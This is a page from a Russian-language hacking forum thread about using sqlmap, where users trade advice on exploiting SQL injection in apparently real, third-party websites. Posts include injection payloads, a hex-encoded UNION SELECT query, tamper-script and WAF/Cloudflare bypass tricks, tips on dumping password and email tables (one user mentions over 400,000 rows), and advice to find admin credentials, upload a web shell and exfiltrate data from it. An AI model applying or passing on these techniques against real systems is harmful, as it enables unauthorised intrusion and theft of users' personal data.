PDA

Просмотр полной версии : Вопросы по SQLMap


Страницы : 1 2 [3] 4 5

MrBa
08.09.2017, 16:21
BabaDook said:
↑ (https://antichat.live/posts/4125698/)
У вас ПМС?


если ко мне, сорри - о чем речь?

RWD
11.09.2017, 16:24
Кто какой набор тамперов использует для клаудфлера?

Roger96
11.09.2017, 20:14
Приветствую , при слитие паролей такая проблема :

https://image.prntscr.com/image/LnZ-Tj9tRxi-8-f9GHZ4hg.png


possible server trimmed output detected (probably due to its length and/or content): as45612"


это Oracle , некоторые льются нормально , а какие-то вот так. "позарез" надо достать ети пароли (

--hex не помогает , если его ввести то пароль приобретет вид из такого as45612 в такой as45612==

RWD
12.09.2017, 00:10
Roger96 said:
↑ (https://antichat.live/posts/4126959/)
это Oracle


Неужели такие еще есть?

spize0r
22.09.2017, 19:12
Ребята, помогите с проблемой. Есть сервер, на нем через sql-shell пытаюсь сделать select,update. не работает.

Выводит:


Code:
[10:58:39] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
[10:58:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:25:20] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

раньше все нормально обновляло и делало select

это при Select.

Если через sql-shell вводить Update:


Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported

Что означает эти надписи?

В частности непонятно, почему можно сделать вывод таблицы через запуск из командной строки, а через --sql-shell нельзя.

artkar
22.09.2017, 20:39
сцылку на уязвимый сайт, команды скульмап, можно сказать точнее, вернее я могу, другим возможно итак понятно

spize0r
23.09.2017, 19:59
artkar said:
↑ (https://antichat.live/posts/4130988/)
сцылку на уязвимый сайт, команды скульмап, можно сказать точнее, вернее я могу, другим возможно итак понятно


--technique=S использовать? нет, не то

artkar
23.09.2017, 22:00
spize0r said:
↑ (https://antichat.live/posts/4131297/)
--technique=S использовать? нет, не то


надо обязательно попробовать, однако мне кажется по уорнингам что апдэйт не возможен, сцылку ты ведь так и недал

yuriy_ivanov
28.09.2017, 00:49
Octavian said:
↑ (https://antichat.live/posts/4089895/)
Скулмап сохраняет старые значение команды и невидет новые помогите


Может я и поздновато на пост отвечу , но всё же))Если скуля дампила какие-нибудь данные , она по ним потом и работает . Тебе надо найти в папке sqlmap этот сайт и удалить вручную ненужную инфу . Сам попадал в такой тупик , когда админ сайта менял пароль , а я не мог понять , почему новые данные не дампятся))

RWD
05.10.2017, 16:41
SQL: select count(id) from item where 1=1 AND UPPER(SUBSTRING(txt,1,1)) = 'T''

как такое раскрутить через sql map. крутит через булеан очень шустро, но тут 100 процентов есть юнион вектор, который скуль видит не до конца.

target URL appears to be UNION injectable with 1 columns

Hilary
10.10.2017, 22:38
Здравствуйте, помогите разобраться.

Был у меня линк который успешно крутился в sqlmap, sqlmap выдавал список всех баз и успешно сливал их. Спустя какое-то время, возможно спалил админ, возможно какие-то другие причины - линк перестал работать. Т.е. sqlmap - просто поднимает старую сессию, по прежнему показывает список бд, таблицы, колонки, и инфу, но только ту, что уже слита, сливать новую инфу из других баз уже не хочет. Выбивает ошибку, да и линк этот перестал работать - редиректит на другую страницу.

Если удалить папку из output, тогда sqlmap перестает видеть дырку и соответсвенно показывать базы.

Был найден друго уязвимый линк на этом же сайте, sqlmap раскручивает линк, но видит уже только 1 базу. Посмотреть таблицы и колонки не дает, дампить соответственно тоже.

Мне нужно заставить sqlmap заново увидеть все эти базы и слить их. Каким образом это можно сделать?

Вот что показывает sqlmap когда находит уязвимость по новому линку их у меня кстати два и по обоим линкам sqlmap видит 2 разные базы.

Parameter: product_id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: product_id=76015 AND 4583=4583

Спасибо, надеюсь на помощь.

panic.ker
23.10.2017, 21:34
palec2006 said:
↑ (https://antichat.live/posts/4140086/)
как для tibe-based использовать BENCHMARK? слип заебал




palec2006 said:
↑ (https://antichat.live/posts/4141344/)
знайшов сам, дякую за допомогу


--test-filter или --test-skip заюзал? Надо для всех уже писать, чтоб подобные вопросы в дальнейшем не возникали.

Alexandr17
07.11.2017, 15:04
Подскажите пожалуйста. Sql Map не выводит имена базы данных. И так и пишет что их невозможно вывести. Предлагает подставить --no-cast --hex. Подставлял, но тоже самое. Есть еще варианты? Кто подскажет, может кто сталкивался с этим при работе с sqlmap

Alexandr17
07.11.2017, 17:28
man474019 said:
↑ (https://antichat.live/posts/4147226/)
--tamper "space2morehash.py" "space2hash.py" (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py)"space2mysqlblank.py (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mysqlblank.py)" "charencode.py (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/charencode.py)" "chardoubleencode.py (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/chardoubleencode.py)" "charunicodeencode.py (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/charunicodeencode.py)" "percentage.py (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/percentage.py)"


Какие только не подставлял значения. И так и сяк и потоки менял. Одна трабла. Вот скрин http://prntscr.com/h7bjon

Burp Suite также находит скулю и sqlmap также пишет что параметр уязвим. Но вот имена БД не выводит. В любом случае благодарю за отклик и помощь

kacergei
07.11.2017, 17:51
Alexandr17 said:
↑ (https://antichat.live/posts/4147242/)
Какие только не подставлял значения. И так и сяк и потоки менял. Одна трабла. Вот скрин
http://prntscr.com/h7bjon
Burp Suite также находит скулю и sqlmap также пишет что параметр уязвим. Но вот имена БД не выводит. В любом случае благодарю за отклик и помощь


Что в логах/запросах выводит? (запрос и ответ от сервера)

PS: " -v VERBOSE Уровень вербальности: 0-6 (по умолчанию 1) "

Alexandr17
07.11.2017, 18:48
kacergei said:
↑ (https://antichat.live/posts/4147248/)
Что в логах/запросах выводит? (запрос и ответ от сервера)
PS: " -v VERBOSE Уровень вербальности: 0-6 (по умолчанию 1) "


Вербальность пробовал разную ставить. Но одни 403 ерроры идут один за другим. Указывал принудительно --method="HTTPS" также еррорит. Ставил разные потоки, таймаут разный ставил. Много чего пробывал. Разные значения, но одно и тоже

t0ma5
07.11.2017, 18:51
Alexandr17 said:
↑ (https://antichat.live/posts/4147192/)
Подскажите пожалуйста. Sql Map не выводит имена базы данных. И так и пишет что их невозможно вывести. Предлагает подставить --no-cast --hex. Подставлял, но тоже самое. Есть еще варианты? Кто подскажет, может кто сталкивался с этим при работе с sqlmap


зачем вы мучаете скульмап

руками скуля отвечает на простые запросы(or 1=1 / or 1=2 / or 1 like 1 / or 1 like 2 / etc)?

руками данные из таблицы information_schema выводятся(select schema_name from information_schema.schemata)?

если да, то ищем что фильтруется и применяем соответствующие тамперы

Alexandr17
07.11.2017, 19:01
t0ma5 said:
↑ (https://antichat.live/posts/4147263/)
зачем вы мучаете скульмап
руками скуля отвечает на простые запросы(or 1=1 / or 1=2 / or 1 like 1 / or 1 like 2 / etc)?
руками данные из таблицы information_schema выводятся(select schema_name from information_schema.schemata)?
если да, то ищем что фильтруется и применяем соответствующие тамперы


Я не профи, поэтому я на этом форуме, чтобы что то познать и чему то новому научиться. Каждый форум такой тематики мне интересен. И я многое узнал и многое не знаю). И мне это интересно

https://prnt.sc/h7bjon

Вот скрин когда вербальность пробую менять http://prntscr.com/h7cyjq

Всё фильтруеться. Он не выводит имена базы данных. Есть Payload, пишет что параметр уязвим. Это по POST запросу не по GET

t0ma5
07.11.2017, 19:11
Alexandr17 said:
↑ (https://antichat.live/posts/4147270/)
Я не профи, поэтому я на этом форуме, чтобы что то познать и чему то новому научиться. Каждый форум такой тематики мне интересен. И я многое узнал. И мне это интересно
https://prnt.sc/h7bjon
Вот скрин когда вербальность пробую менять
http://prntscr.com/h7cyjq
Всё фильтруеться. Он не выводит имена базы данных. Есть Payload, пишет что параметр уязвим. Это по POST запросу не по GET


я хотел сказать что руками самому нужно пробовать, чтобы понять что происходит, на скрине пишут что сервер возвращает 403, похоже что и правда фильтр

повторюсь, чтобы понять как обойти, надо узнать на что именно срабатывает фильтр

самые распространённые вариант bypass'а

- попробовать разный регистр букв

- переносы строк

- запрос в комментариях /*! */

- нулл байт вначале запроса /*%00*/

- замена пробелов на + %0d %0a %a0 %0b /**/

ещё кстати можно разделять пробелами имя базы и таблицы(ну кто знает какими рексами там поиск идёт)


Code:
> select 1 from information_schema . schemata limit 1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

и читать маны по дорку "sql injection waf bypass"

Muracha
11.11.2017, 13:25
Есть уязвимый сайт, который очень долго выводит и перебирает базы данных, таблицы, колонки.


Code:
arameter: fid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: &fid=2656 AND 5461=5461

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: &fid=2656 AND SLEEP(10)
---

Понимаю,что слепая иньекция, но можно ли увеличить скорость перебора?


Code:
[13:14:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:14:26] [INFO] retrieved:
[13:14:28] [WARNING] reflective value(s) found and filtering out
77

grimnir
11.11.2017, 15:04
Muracha said:
↑ (https://antichat.live/posts/4148514/)
Есть уязвимый сайт, который очень долго выводит и перебирает базы данных, таблицы, колонки.

Code:
arameter: fid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: &fid=2656 AND 5461=5461

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: &fid=2656 AND SLEEP(10)
---

Понимаю,что слепая иньекция, но можно ли увеличить скорость перебора?

Code:
[13:14:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:14:26] [INFO] retrieved:
[13:14:28] [WARNING] reflective value(s) found and filtering out
77



тут лучше тогда сразу искать нужные данные --search -T admin и т.д --search -C pass чтобы время не тратить. И потоков побольше , если можно --threads=15!

Может еще есть какие уязвимости, которые можно в Union или Error раскрутить

Leendesst
15.11.2017, 15:06
Есть Sql-inj. Выбивает такой error


Code:
Database_Exception [ 1064 ]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 [ SELECT id FROM `users` WHERE `id` = '1'' ]

Сайт под cloudflaer'ом, его в sql-map'е обойти труда не составило, но ошибку он не видит. Пробовал и так /user/1* и так /user/*. Помогите пожйлуйста.

t0ma5
15.11.2017, 16:06
Leendesst said:
↑ (https://antichat.live/posts/4150016/)
Есть Sql-inj. Выбивает такой error

Code:
Database_Exception [ 1064 ]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 [ SELECT id FROM `users` WHERE `id` = '1'' ]

Сайт под cloudflaer'ом, его в sql-map'е обойти труда не составило, но ошибку он не видит. Пробовал и так /user/1* и так /user/*. Помогите пожйлуйста.


--level 3 попробуй, и возможно ещё куки нужны --cookie

Muracha
15.11.2017, 18:30
Mysql:MariaDB

Type: AND/OR time-based blind

Если копать сайт вручную, он блокирует запросы при выборе user(), version(), database() - вручную таблицы выводит.

Используя sqlmap начинаются рождаться всякие птеродактили в ввиде ошибок:


Code:
[18:20:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[18:20:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

и


Code:
[18:19:32] [ERROR] invalid character detected. retrying..

Я голову сломал как обойти неправильную кодировку.

пробовал так:


Code:
--tables --fresh-queries --time-sec=30 --no-cast --fresh-queries

и так


Code:
--table - space2comment --tables --fresh-queries --time-sec=30 --fresh-queries --hex

Таблицы не видит из-за неправильной кодировки. Все же, как правильно составить запрос, чтобы прочитать их?

Muracha
15.11.2017, 18:48
Взял запрос sqlmap и попытался модифицировать


Code:
-6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071, 0x4c754378766f69486f7a7270574e796c525666716c766b61 524c435a644a4565566d73534a424348,0x716a766b71),71, table_name%20FROM%20information_schema.tables%20WH ERE%20table_schema=0x64623139353861%20--

Выводит пустую страницу, но при запросе


Code:
index.php?id=-6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071, 0x4c754378766f69486f7a7270574e796c525666716c766b61 524c435a644a4565566d73534a424348,0x716a766b71),71, user()--%20giyw%20---

уже выдает результаты.

Как с помощью sqlmap или уже вручную составить запрос и вывести эти таблицы

Muracha
26.11.2017, 12:13
Крутится на 80 порту демон "DataPalm"

sqlmap при таком запросе выдает несуразицу


Code:
-D BAZA -T TABLE -C password --dump --threads=10 --hex --parse-errors --cookie="cookies" --random-agent


.SpoilerTarget" type="button">Spoiler: text
Вот как выдернуть данные из колонки, чтобы они не были дичью?

[12:04:03] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[12:04:03] [INFO] fetching entries of column(s) 'password' for table 'documents' in database ''

[12:04:03] [INFO] fetching number of column(s) 'password' entries for table 'documents' in database ''

[12:04:03] [INFO] resumed: 2417

[12:04:03] [INFO] retrieving the length of query output

[12:04:03] [INFO] retrieved:

[12:04:04] [WARNING] reflective value(s) found and filtering out

[12:04:08] [INFO] retrieved:

[12:04:08] [INFO] resumed: \x08\x18

[12:04:08] [INFO] retrieving the length of query output

[12:04:13] [INFO] retrieved:

[12:04:13] [INFO] resumed: \x07\xffs_a3RD

[12:04:13] [INFO] retrieving the length of query output

[12:04:18] [INFO] retrieved:

[12:04:24] [INFO] retrieved:

[12:04:24] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically

[12:04:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

[12:05:10] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)

[12:05:12] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[12:05:15] [INFO] retrieved:

[12:05:15] [INFO] retrieving the length of query output

[12:05:19] [INFO] retrieved:

[12:05:25] [INFO] retrieved:

[12:05:28] [INFO] retrieved:

[12:05:28] [INFO] retrieving the length of query output

[12:05:32] [INFO] retrieved:

[12:05:39] [INFO] retrieved:

[12:05:45] [INFO] retrieved:

[12:05:45] [INFO] retrieving the length of query output

[12:05:50] [INFO] retrieved:

[12:05:56] [INFO] retrieved:

[12:06:00] [INFO] retrieved:

[12:06:00] [INFO] retrieving the length of query output

[12:06:09] [INFO] retrieved:

[12:06:20] [INFO] retrieved:

[12:06:25] [INFO] retrieved:

[12:06:25] [INFO] retrieving the length of query output

[12:06:30] [INFO] retrieved:

[12:06:35] [INFO] retrieved:

[12:06:39] [INFO] retrieved:

[12:06:39] [INFO] retrieving the length of query output

[12:06:43] [INFO] retrieved:

[12:06:50] [INFO] retrieved:

[12:06:54] [INFO] retrieved:

[12:06:54] [INFO] retrieving the length of query output

[12:06:59] [INFO] retrieved:

[12:07:05] [INFO] retrieved:

[12:07:09] [INFO] retrieved:

[12:07:09] [INFO] retrieving the length of query output

[12:07:13] [INFO] retrieved:

[12:07:22] [INFO] retrieved:

[12:07:26] [INFO] retrieved:

[12:07:26] [INFO] retrieving the length of query output

[12:07:30] [INFO] retrieved:

[12:07:35] [INFO] retrieved:

[12:07:39] [INFO] retrieved:

[12:07:39] [INFO] retrieving the length of query output

[12:07:44] [INFO] retrieved:

[12:07:50] [INFO] retrieved:

[12:07:55] [INFO] retrieved:

[12:07:55] [INFO] retrieving the length of query output

[12:08:01] [INFO] retrieved:

[12:08:08] [INFO] retrieved:

[12:08:13] [INFO] retrieved:

[12:08:13] [INFO] retrieving the length of query output

[12:08:13] [INFO] retrieved:

johncena55
04.12.2017, 12:33
Подскажите пожалуйста из-за чего может быть такая проблема?

.SpoilerTarget" type="button">Spoiler: error
[08:22:58] [INFO] fetching database names

[08:22:58] [INFO] fetching number of databases

[08:22:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

[08:23:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[08:24:57] [ERROR] invalid character detected. retrying..

[08:25:33] [ERROR] invalid character detected. retrying..

[08:26:10] [ERROR] invalid character detected. retrying..

[08:26:46] [ERROR] invalid character detected. retrying..

[08:27:23] [ERROR] invalid character detected. retrying..

[08:29:25] [ERROR] unable to properly validate last character value ('3')..

[08:30:02] [ERROR] invalid character detected. retrying..

grimnir
04.12.2017, 15:46
johncena55 said:
↑ (https://antichat.live/posts/4156431/)
Подскажите пожалуйста из-за чего может быть такая проблема?
Spoiler: error
[08:24:57] [ERROR] invalid character detected. retrying..


еще часто ошибка когда у вас слабый интернет , высокий Ping (если через Wi-Fi) или что-то качается попутно, забивает траффик , тогда sqlmap не может верно расчитать время и начинает сыпать ошибки.

johncena55
04.12.2017, 16:09
man474019 said:
↑ (https://antichat.live/posts/4156501/)
--hex, --no-cast


Пробовал и то и другое...


grimnir said:
↑ (https://antichat.live/posts/4156508/)
еще часто ошибка когда у вас слабый интернет , высокий Ping (если через Wi-Fi) или что-то качается попутно, забивает траффик , тогда sqlmap не может верно расчитать время и начинает сыпать ошибки.


Интернет хороший, первый раз столкнулся с такой проблемой..

Уже добирался до дб этого сайта, но было много ошибок, решил другой параметр пустить, теперь и тот и другой дает эти ошибки..

grimnir
04.12.2017, 16:29
johncena55 said:
↑ (https://antichat.live/posts/4156517/)
Пробовал и то и другое...
Интернет хороший, первый раз столкнулся с такой проблемой..
Уже добирался до дб этого сайта, но было много ошибок, решил другой параметр пустить, теперь и тот и другой дает эти ошибки..


похоже на работу waf. Попробуйте тогда --tamper= и из списка https://github.com/sqlmapproject/sqlmap/tree/master/tamper может получится обойти

johncena55
04.12.2017, 16:40
grimnir said:
↑ (https://antichat.live/posts/4156528/)
похоже на работу waf. Попробуйте тогда --tamper= и из списка
https://github.com/sqlmapproject/sqlmap/tree/master/tamper
может получится обойти


Спасибо, попробую! Некоторые из них уже пробовал..Вроде их через запятую несколько можно сразу использовать или лучше по одному?

grimnir
04.12.2017, 16:45
johncena55 said:
↑ (https://antichat.live/posts/4156534/)
Спасибо, попробую! Некоторые из них уже пробовал..Вроде их через запятую несколько можно сразу использовать или лучше по одному?


через запятую да ,их комбинировать нужно ,к примеру разный регистр+замена символов и т.д

В идеале бы найти такой линк ,где точно не ТаймБлайнд --technique=EUB

johncena55
04.12.2017, 17:23
grimnir said:
↑ (https://antichat.live/posts/4156539/)
через запятую да ,их комбинировать нужно ,к примеру разный регистр+замена символов и т.д
В идеале бы найти такой линк ,где точно не ТаймБлайнд --technique=EUB


Перебором их подбирать?

И еще хотел спросить, дамплю таблицу..1 строка примерно 10-20 минут, когда выбираю только 2 колонки(-C email,pass) все 400к+ сливаются за секунду, но строки "NULL", хотя при дампе все таблицы видно, что они не пустые.. --hex помогало при таких случаях, но сейчас такая же скорость, как и была.

grimnir
04.12.2017, 17:35
johncena55 said:
↑ (https://antichat.live/posts/4156563/)
Перебором их подбирать?
И еще хотел спросить, дамплю таблицу..1 строка примерно 10-20 минут, когда выбираю только 2 колонки(-C email,pass) все 400к+ сливаются за секунду, но строки "NULL", хотя при дампе все таблицы видно, что они не пустые.. --hex помогало при таких случаях, но сейчас такая же скорость, как и была.


тайм-блайнд это самый медленный из возможных способов и ненадежный, т.к может выдать при лаге интернета 1 неверный символ и все. Лучшим решением в такой ситуации или поиск другой скули в другом линке ,не таймблайнд ,или поиск и раскрутка данных админа( к примеру --search -T adm --search -C pass) , заливка на сайт и уже сливать с шелла все

panic.ker
04.12.2017, 18:57
grimnir said:
↑ (https://antichat.live/posts/4156578/)
тайм-блайнд это самый медленный из возможных способов и ненадежный, т.к может выдать при лаге интернета 1 неверный символ и все. Лучшим решением в такой ситуации или поиск другой скули в другом линке ,не таймблайнд ,или поиск и раскрутка данных админа( к примеру --search -T adm --search -C pass) , заливка на сайт и уже сливать с шелла все


Таймблайнд это пзд. Если mysql.user не под тобой или данных админа нет-это пздц борода втройне. Только ныть или месяцами мучаться. Даже хэш админа иногда слить только с 5го раза получается, т.к. как выше гримнир отписал-малейший косяк коннекта-и пздц. Если есть такая эррорка на таргете, то есть и другие 99% из ста. Ищи, да обрящешь =)

johncena55
04.12.2017, 19:16
johncena55 said:
↑ (https://antichat.live/posts/4156431/)
Подскажите пожалуйста из-за чего может быть такая проблема?
Spoiler: error
[08:22:58] [INFO] fetching database names
[08:22:58] [INFO] fetching number of databases
[08:22:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[08:23:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[08:24:57] [ERROR] invalid character detected. retrying..
[08:25:33] [ERROR] invalid character detected. retrying..
[08:26:10] [ERROR] invalid character detected. retrying..
[08:26:46] [ERROR] invalid character detected. retrying..
[08:27:23] [ERROR] invalid character detected. retrying..
[08:29:25] [ERROR] unable to properly validate last character value ('3')..
[08:30:02] [ERROR] invalid character detected. retrying..



Решил проблему тем, что взял другую уязвимость))

Но опять же, есть проблема со скоростью дампа

panic.ker
04.12.2017, 20:08
Неугомонный... Дело в инете, серваке, баге? Откуда мы знаем! Если не боишься пару к на дампе потерять, зайди sqlmap/lib/core/settings.py и найди пункт MAX_NUMBER_OF_THREADS,максимум по умолчанию 10 потоков, ебани 500 чтоли. или аххулиард. Советую не более 200. И так на 5-10 впс \ вдс

johncena55
04.12.2017, 20:37
panic.ker said:
↑ (https://antichat.live/posts/4156697/)
Неугомонный... Дело в инете, серваке, баге? Откуда мы знаем! Если не боишься пару к на дампе потерять, зайди sqlmap/lib/core/settings.py и найди пункт MAX_NUMBER_OF_THREADS,максимум по умолчанию 10 потоков, ебани 500 чтоли. или аххулиард. Советую не более 200. И так на 5-10 впс \ вдс



С инетом все в порядке, сам не знаю в чем проблема, с 2мя сайтами только проблемы. Сделал как ты сказал, поставил 70 для теста, ничего не поменялос

panic.ker
04.12.2017, 20:39
Экстрасенсы в отпуске.

grimnir
04.12.2017, 21:30
panic.ker said:
↑ (https://antichat.live/posts/4156697/)
Неугомонный... Дело в инете, серваке, баге? Откуда мы знаем! Если не боишься пару к на дампе потерять, зайди sqlmap/lib/core/settings.py и найди пункт MAX_NUMBER_OF_THREADS,максимум по умолчанию 10 потоков, ебани 500 чтоли. или аххулиард. Советую не более 200. И так на 5-10 впс \ вдс


можно ставить больше 10 потоков --threads=500! и он тогда проигнорирует 10 ,только смысла да нету от такого количества.сайт может заблочить или ддос устроит

grimnir
04.12.2017, 21:33
johncena55 said:
↑ (https://antichat.live/posts/4156734/)
С инетом все в порядке, сам не знаю в чем проблема, с 2мя сайтами только проблемы. Сделал как ты сказал, поставил 70 для теста, ничего не поменялос


если тип Time-Blind то потоки игнорируются, будет только 1 работать

Xsite
09.12.2017, 05:01
Ребят подскажите плиз , как с помощью sqlmap авторизоваться на сайте?

Есть скуля в пост запросе , найдена при помощи авторизации на сайте

Пробую :

.SpoilerTarget" type="button">Spoiler
--cookie=ASPSESSIONIDCQSDQRSS=OMHKNEDBBDFKPFLFIMDPIA NK; test=hello; test=hello; __gads=ID=1632b20c4795492f:T=1512751255:S=ALNI_Mau 6tkrI2G96nuA3gdcoN9z5FEQPw; IDE=AHWqTUm_HYOPksLNH_T703Y9aoCsKUaP1ERw7aYLEsceda gsiUOuRu1FBORFTVZd; __qca=P0-97155261-1512751246541; _ga=GA1.2.1743265153.1512751247; _gid=GA1.2.1436679549.1512751247; _gat=1

Идет редирект на страницу авторизации для ввода логина и пасса https://www.xxx.com/index.asp?page=login.asp&cookie_ck=1 и скуля конечно не крутится

panic.ker
09.12.2017, 05:34
Может сессия закончилась, sqlmap будет спрашивать merge cookie, не соглашайся. Авторизуйся по новой, отследи новые куки и их попробуй подставить.

Xsite
09.12.2017, 15:06
panic.ker said:
↑ (https://antichat.live/posts/4158675/)
Может сессия закончилась, sqlmap будет спрашивать merge cookie, не соглашайся. Авторизуйся по новой, отследи новые куки и их попробуй подставить.


Попробовал часть cookie заменить , редиректит хз куда , хотя скуля есть 100%

Alexandr17
09.12.2017, 16:50
Xsite said:
↑ (https://antichat.live/posts/4158782/)
Попробовал часть cookie заменить , редиректит хз куда , хотя скуля есть 100%


Каким сканером скулю нашел? Burpsuite? Бывало и меня sqlmap на 100% скули писал возможно boolean-blind, а потом что ложно. И как-то с 20-го раза где-то, я получил БД, при том же инжекте. Пробуй просканить другим сканером. Netsparker, Acunetix (по лучше будет)... И кинь найденный инжект в sqlmap. Пробуй с --random-agent --level=5 --risk=3. У тебя в POST запросе при авторизации. Пробуй по новой зарегайся на сайте и с помощью BurpSuite опять получи PHPSESSID при авторизации и подставь их. Раскручивай скулю, то есть потоки меняй --threads=10, подставляй темперы --tamper и так далее

Xsite
09.12.2017, 18:56
Alexandr17 said:
↑ (https://antichat.live/posts/4158815/)
Каким сканером скулю нашел? Burpsuite? Бывало и меня sqlmap на 100% скули писал возможно boolean-blind, а потом что ложно. И как-то с 20-го раза где-то, я получил БД, при том же инжекте. Пробуй просканить другим сканером. Netsparker, Acunetix (по лучше будет)... И кинь найденный инжект в sqlmap. Пробуй с --random-agent --level=5 --risk=3. У тебя в POST запросе при авторизации. Пробуй по новой зарегайся на сайте и с помощью BurpSuite опять получи PHPSESSID при авторизации и подставь их. Раскручивай скулю, то есть потоки меняй --threads=10, подставляй темперы --tamper и так далее



Все что ты отписал уже было сделано , https://ibb.co/cqOqLG

Как я понимаю меп не может подцепить авторизацию , хз почему

grimnir
09.12.2017, 19:39
Xsite said:
↑ (https://antichat.live/posts/4158672/)
Ребят подскажите плиз , как с помощью sqlmap авторизоваться на сайте?
Есть скуля в пост запросе , найдена при помощи авторизации на сайте
Пробую :
Spoiler
--cookie=ASPSESSIONIDCQSDQRSS=OMHKNEDBBDFKPFLFIMDPIA NK; test=hello; test=hello; __gads=ID=1632b20c4795492f:T=1512751255:S=ALNI_Mau 6tkrI2G96nuA3gdcoN9z5FEQPw; IDE=AHWqTUm_HYOPksLNH_T703Y9aoCsKUaP1ERw7aYLEsceda gsiUOuRu1FBORFTVZd; __qca=P0-97155261-1512751246541; _ga=GA1.2.1743265153.1512751247; _gid=GA1.2.1436679549.1512751247; _gat=1
Идет редирект на страницу авторизации для ввода логина и пасса
https://www.xxx.com/index.asp?page=login.asp&cookie_ck=1
и скуля конечно не крутится


лучше тогда полный запрос с акунетикса скопировать в файл как он есть ,к примеру 1.txt ,указать какой параметр там нужно тестировать * и потом пробовать раскрутить -r 1.txt

Alexandr17
09.12.2017, 19:55
grimnir said:
↑ (https://antichat.live/posts/4158846/)
лучше тогда полный запрос с акунетикса скопировать в файл как он есть ,к примеру 1.txt ,указать какой параметр там нужно тестировать * и потом пробовать раскрутить -r 1.txt


Acunetix или Burp это как раз и определяют. Надо в POST запросе найти уязвимый параметр. Netsparker параметр не определил

Xsite
09.12.2017, 20:33
grimnir said:
↑ (https://antichat.live/posts/4158846/)
лучше тогда полный запрос с акунетикса скопировать в файл как он есть ,к примеру 1.txt ,указать какой параметр там нужно тестировать * и потом пробовать раскрутить -r 1.txt


Делал , не получилось , сразу через ключ -r


Alexandr17 said:
↑ (https://antichat.live/posts/4158850/)
Acunetix или Burp это как раз и определяют. Надо в POST запросе найти уязвимый параметр. Netsparker параметр не определил


Ой лол все там определило

Jenny_victor
12.12.2017, 13:30
Здравствуйте! Подскажите пожалуйста, возможно ли как то ускорить скорость дампа, нахождения дб, колонок при слепой инъекции ?

Alexandr17
12.12.2017, 14:51
Jenny_victor said:
↑ (https://antichat.live/posts/4160015/)
Здравствуйте! Подскажите пожалуйста, возможно ли как то ускорить скорость дампа, нахождения дб, колонок при слепой инъекции ?


Тут зависит многое от скорости интернета. Возможно через прокси, vpn работаешь. Либо через виртуалку. Из-за этого скорость падает

grimnir
12.12.2017, 16:19
Jenny_victor said:
↑ (https://antichat.live/posts/4160015/)
Здравствуйте! Подскажите пожалуйста, возможно ли как то ускорить скорость дампа, нахождения дб, колонок при слепой инъекции ?


Если Boolean-Blind то потоки увеличить,как выше написали --threads=10 выше не нужно

Если Time-Blind и сайт может работать по HTTP а не HTTPS то можно попробовать раскрутить в старой программе Havij та умеет крутить таймблайнд сразу по всем потокам, а не по 1 символу как SQLMAP

Ну а в идеале конечно нужно искать данные именно админа ,заливаться и уже быстро что нужно сливать, если такая необходимость. Поиск нужных данных в sqlmap --search -T adm --search -C pas ну и т.д

Jenny_victor
13.12.2017, 21:37
Alexandr17 said:
↑ (https://antichat.live/posts/4160051/)
Тут зависит многое от скорости интернета. Возможно через прокси, vpn работаешь. Либо через виртуалку. Из-за этого скорость падает


С интернетом все окей, остальное, что не Blind Sql Injection льется нормально.


grimnir said:
↑ (https://antichat.live/posts/4160084/)
Если Boolean-Blind то потоки увеличить,как выше написали --threads=10 выше не нужно
Если Time-Blind и сайт может работать по HTTP а не HTTPS то можно попробовать раскрутить в старой программе Havij та умеет крутить таймблайнд сразу по всем потокам, а не по 1 символу как SQLMAP
Ну а в идеале конечно нужно искать данные именно админа ,заливаться и уже быстро что нужно сливать, если такая необходимость. Поиск нужных данных в sqlmap --search -T adm --search -C pas ну и т.д


Поиск нужных данных не пригождался, так как все таблицы и колонки находились исправно, но долго

Boolean-Blind судя по всему вообще не попадались, прибавление потоков ничего не изменило и слив в 10+ окон тоже, а в некоторых случаях дамп крашился

Попробовал как вы сказали раскрутить в Havij, вроде некоторые сайты получилось, но DB так и не нашло, поле осталось пустым..некоторые и вовсе не удалось

.SpoilerTarget" type="button">Spoiler: Может эти строки что то подскажут
[22:52:15] [ERROR] invalid character detected. retrying..

==================================================

[17:20:28] [ERROR] invalid character detected. retrying..

[17:20:28] [WARNING] increasing time delay to 3 seconds

